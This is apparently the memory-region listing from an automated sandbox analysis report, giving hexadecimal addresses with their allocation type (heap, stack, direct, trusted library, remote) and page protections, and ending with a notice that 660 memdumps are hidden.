1E3D89CD000
heap
page read and write
2E7D000
stack
page read and write
27B9DCFF000
heap
page read and write
27B9DEF9000
heap
page read and write
27B9BDC0000
heap
page read and write
1E3C20AD000
trusted library allocation
page read and write
208A0000
direct allocation
page read and write
27B9DE17000
heap
page read and write
27B9DEE8000
heap
page read and write
1E3D8C60000
heap
page read and write
27B9DE02000
heap
page read and write
208C0000
direct allocation
page read and write
27B9DE1D000
heap
page read and write
27B9DCA5000
heap
page read and write
2B95000
heap
page read and write
45A8000
trusted library allocation
page read and write
27B9BFBD000
heap
page read and write
2A3D000
stack
page read and write
20130000
direct allocation
page read and write
80DD000
heap
page read and write
806F000
stack
page read and write
27B9DCB2000
heap
page read and write
27B9DDBF000
heap
page read and write
27B9DF56000
heap
page read and write
20160000
direct allocation
page read and write
27B9DE91000
heap
page read and write
85F0000
trusted library allocation
page read and write
1E3C1F9C000
trusted library allocation
page read and write
1E3C0150000
heap
page read and write
44B9000
trusted library allocation
page read and write
20110000
direct allocation
page read and write
27B9DCB9000
heap
page read and write
7FFD9B916000
trusted library allocation
page read and write
72F6000
heap
page read and write
662093E000
stack
page read and write
7580000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
1E3D8742000
heap
page read and write
27B9DD0C000
heap
page read and write
27B9DCBA000
heap
page read and write
25DD000
stack
page read and write
27B9DED3000
heap
page read and write
5131000
heap
page read and write
27B9DE87000
heap
page read and write
71F8000
trusted library allocation
page read and write
27B9DCD0000
heap
page read and write
27B9DE74000
heap
page read and write
2EBE000
stack
page read and write
28FD000
stack
page read and write
6BE0000
direct allocation
page read and write
20080000
direct allocation
page read and write
27B9DEF5000
heap
page read and write
1E3D064A000
trusted library allocation
page read and write
27B9DF66000
heap
page read and write
2780000
heap
page read and write
1E3BE733000
heap
page read and write
7FFD9B864000
trusted library allocation
page read and write
1E3C1FB8000
trusted library allocation
page read and write
209EF000
stack
page read and write
2BB0000
heap
page read and write
80CD000
heap
page read and write
27B9DE2E000
heap
page read and write
27B9DF49000
heap
page read and write
4E80000
heap
page read and write
66208BE000
stack
page read and write
27B9DE86000
heap
page read and write
1E3C0B30000
trusted library allocation
page read and write
27B9DE3D000
heap
page read and write
27B9BFCC000
heap
page read and write
1E3C0B07000
trusted library allocation
page read and write
27B9DE13000
heap
page read and write
27B9DE13000
heap
page read and write
6D1D000
stack
page read and write
2C70000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
9AEF2FF000
stack
page read and write
7570000
trusted library allocation
page read and write
27B9DE4A000
heap
page read and write
662047E000
stack
page read and write
200E0000
direct allocation
page read and write
27B9DE65000
heap
page read and write
27B9DF6C000
heap
page read and write
27B9DE80000
heap
page read and write
9AEF4FB000
stack
page read and write
1E3BFFB0000
trusted library allocation
page read and write
27B9BF3B000
heap
page read and write
27B9E084000
heap
page read and write
27B9DCA4000
heap
page read and write
72EA000
heap
page read and write
8020000
heap
page read and write
6C70000
direct allocation
page read and write
2B94000
heap
page read and write
746E000
stack
page read and write
8090000
heap
page read and write
27B9DCF7000
heap
page read and write
27B9DE7C000
heap
page read and write
2B92000
heap
page read and write
27B9DE1D000
heap
page read and write
8310000
trusted library allocation
page execute and read and write
27B9D840000
remote allocation
page read and write
80C3000
heap
page read and write
2B5B000
heap
page read and write
27B9DE82000
heap
page read and write
1E3C0B45000
trusted library allocation
page read and write
27B9DF5D000
heap
page read and write
27B9DFEF000
heap
page read and write
27B9DE77000
heap
page read and write
4964000
trusted library allocation
page read and write
2B7B000
heap
page read and write
7FFD9B920000
trusted library allocation
page execute and read and write
7310000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
74D0000
trusted library allocation
page read and write
27B9DDDB000
heap
page read and write
27B9DCD7000
heap
page read and write
27B9DD02000
heap
page read and write
8070000
trusted library allocation
page execute and read and write
20CAE000
stack
page read and write
27B9DD08000
heap
page read and write
1E3D897F000
heap
page read and write
27CE000
stack
page read and write
44A0000
trusted library allocation
page read and write
27D0000
heap
page read and write
27B9BF09000
heap
page read and write
27B9DE3D000
heap
page read and write
6B8E000
stack
page read and write
742E000
stack
page read and write
85CD000
stack
page read and write
27B9E07E000
heap
page read and write
7F6F0000
trusted library allocation
page execute and read and write
7FFD9B870000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
27B9DF5B000
heap
page read and write
27B9DE31000
heap
page read and write
228E59FB000
heap
page read and write
6C60000
direct allocation
page read and write
27B9DE82000
heap
page read and write
1E3C0826000
trusted library allocation
page read and write
662150B000
stack
page read and write
74E0000
trusted library allocation
page read and write
27B9DE3D000
heap
page read and write
255D000
stack
page read and write
2CC0000
trusted library section
page read and write
228E5B10000
heap
page read and write
27B9DE3D000
heap
page read and write
661FFD3000
stack
page read and write
7FFD9B863000
trusted library allocation
page execute and read and write
662037F000
stack
page read and write
7500000
trusted library allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
80D9000
heap
page read and write
27B9DE2E000
heap
page read and write
7FFD9BA00000
trusted library allocation
page read and write
6C90000
direct allocation
page read and write
1E3BE725000
heap
page read and write
27B9DCC5000
heap
page read and write
1E3D8847000
heap
page execute and read and write
1E3BE5E0000
heap
page read and write
27B9DE41000
heap
page read and write
27B9BFE3000
heap
page read and write
27B9BFDC000
heap
page read and write
2970000
heap
page read and write
7FFD9BB70000
trusted library allocation
page read and write
75EB000
stack
page read and write
27B9DF66000
heap
page read and write
200F0000
direct allocation
page read and write
2ACA000
heap
page read and write
27B9DEF8000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
74AD000
stack
page read and write
27B9DE4A000
heap
page read and write
27B9DE7F000
heap
page read and write
27B9DE38000
heap
page read and write
27B9BFB6000
heap
page read and write
27B9BFCF000
heap
page read and write
7550000
trusted library allocation
page read and write
854C000
stack
page read and write
2709000
stack
page read and write
7102000
heap
page read and write
7291000
heap
page read and write
5811000
trusted library allocation
page read and write
27B9DE43000
heap
page read and write
4650000
trusted library allocation
page read and write
6C10000
direct allocation
page read and write
7360000
trusted library allocation
page read and write
1E3D86E2000
heap
page read and write
5877000
trusted library allocation
page read and write
27B9C040000
heap
page read and write
27B9BFE3000
heap
page read and write
27B9DE82000
heap
page read and write
27B9DE63000
heap
page read and write
7FFD9BA50000
trusted library allocation
page execute and read and write
1E3C0154000
heap
page read and write
5175000
heap
page read and write
27B9DDC7000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
27B9DCD1000
heap
page read and write
80E1000
heap
page read and write
27B9DF5B000
heap
page read and write
1E3BE72D000
heap
page read and write
44AD000
trusted library allocation
page execute and read and write
2A4F000
unkown
page read and write
1E3BE76F000
heap
page read and write
7FFD9B910000
trusted library allocation
page read and write
27B9DE75000
heap
page read and write
27B9DE86000
heap
page read and write
6D5A000
stack
page read and write
1E3BE6C0000
heap
page readonly
599C000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
1E3C00E0000
heap
page read and write
27B9DCCD000
heap
page read and write
20D30000
heap
page read and write
2940000
heap
page read and write
27B9DE62000
heap
page read and write
6C50000
direct allocation
page read and write
27B9BFCC000
heap
page read and write
2AFC000
heap
page read and write
27B9DEF9000
heap
page read and write
7530000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
228E5AF0000
heap
page read and write
80A0000
heap
page read and write
662027E000
stack
page read and write
9AEEBFE000
stack
page read and write
6BF0000
direct allocation
page read and write
9AEF1FC000
stack
page read and write
479E000
stack
page read and write
70DF000
stack
page read and write
1E3BE640000
heap
page read and write
27B9DE87000
heap
page read and write
66202BF000
stack
page read and write
4540000
heap
page readonly
44D5000
trusted library allocation
page execute and read and write
7F80000
trusted library allocation
page execute and read and write
27B9DCA2000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
1E3C16F9000
trusted library allocation
page read and write
27B9DCE2000
heap
page read and write
9AEEEFF000
stack
page read and write
50B0000
direct allocation
page read and write
1E3D898A000
heap
page read and write
27B9BFD2000
heap
page read and write
66203FD000
stack
page read and write
8107000
heap
page read and write
27B9E07E000
heap
page read and write
74B0000
trusted library allocation
page read and write
27B9BFDD000
heap
page read and write
27B9E160000
heap
page read and write
27B9DDA1000
heap
page read and write
228E59C0000
heap
page read and write
73A0000
heap
page execute and read and write
453E000
stack
page read and write
27B9DED5000
heap
page read and write
27B9DE62000
heap
page read and write
1E3D89BB000
heap
page read and write
1E3D8950000
heap
page read and write
2B8F000
stack
page read and write
96125FF000
stack
page read and write
27B9E088000
heap
page read and write
27B9DD0C000
heap
page read and write
6E60000
heap
page read and write
4490000
trusted library allocation
page read and write
1E3D8774000
heap
page read and write
4CB2000
remote allocation
page execute and read and write
2CBE000
stack
page read and write
26FD000
stack
page read and write
27B9DE43000
heap
page read and write
27B9DCDA000
heap
page read and write
27B9DF5B000
heap
page read and write
2B50000
heap
page read and write
27B9DEF5000
heap
page read and write
27B9DE1D000
heap
page read and write
27B9DEF4000
heap
page read and write
8620000
trusted library allocation
page read and write
20120000
direct allocation
page read and write
1E3C1545000
trusted library allocation
page read and write
27B9DE4A000
heap
page read and write
5080000
heap
page read and write
27B9E07E000
heap
page read and write
7FFD9BB60000
trusted library allocation
page read and write
27B9DFC4000
heap
page read and write
27B9BFCC000
heap
page read and write
4F65000
heap
page read and write
20BAE000
stack
page read and write
1E3C03E1000
trusted library allocation
page read and write
27B9DDB3000
heap
page read and write
2AEF000
heap
page read and write
27B9DEE0000
heap
page read and write
721E000
heap
page read and write
27B9DF74000
heap
page read and write
27B9BFE3000
heap
page read and write
1E3C07CC000
trusted library allocation
page read and write
44B0000
trusted library allocation
page read and write
72A6000
heap
page read and write
2ABF000
stack
page read and write
2B9B000
heap
page read and write
1E3D876C000
heap
page read and write
27B9DEE9000
heap
page read and write
27B9BFC2000
heap
page read and write
7DF43B090000
trusted library allocation
page execute and read and write
2A7E000
stack
page read and write
27B9DEF9000
heap
page read and write
66204FE000
stack
page read and write
20170000
direct allocation
page read and write
1E3BE500000
heap
page read and write
27B9C045000
heap
page read and write
5173000
trusted library allocation
page read and write
2B6F000
unkown
page read and write
27B9DCA4000
heap
page read and write
27B9DEF9000
heap
page read and write
26CC000
stack
page read and write
1E3BE600000
heap
page read and write
5177000
heap
page read and write
27B9DE1D000
heap
page read and write
1E3C2193000
trusted library allocation
page read and write
27B9E07E000
heap
page read and write
27B9DCFA000
heap
page read and write
27B9DE3D000
heap
page read and write
2B56000
heap
page read and write
27B9DE82000
heap
page read and write
4550000
heap
page read and write
200C0000
direct allocation
page read and write
296F000
stack
page read and write
27B9DE1F000
heap
page read and write
27B9BFAB000
heap
page read and write
27B9BFE3000
heap
page read and write
1E3D0381000
trusted library allocation
page read and write
27B9DEA4000
heap
page read and write
27B9DE76000
heap
page read and write
27B9DE13000
heap
page read and write
27B9DE82000
heap
page read and write
4F60000
heap
page read and write
27B9DEF9000
heap
page read and write
27B9DEEC000
heap
page read and write
2BC0000
heap
page read and write
1E3BFFB2000
trusted library allocation
page read and write
59A2000
trusted library allocation
page read and write
6C80000
direct allocation
page read and write
7347000
trusted library allocation
page read and write
1E3D0361000
trusted library allocation
page read and write
2720000
heap
page read and write
20C2E000
stack
page read and write
961213D000
stack
page read and write
27B9BF2F000
heap
page read and write
27B9DF73000
heap
page read and write
662057E000
stack
page read and write
27B9DCB5000
heap
page read and write
27B9DE2E000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
1E3BFF80000
trusted library allocation
page read and write
27B9DE5D000
heap
page read and write
There are 660 hidden memdumps, click here to show them.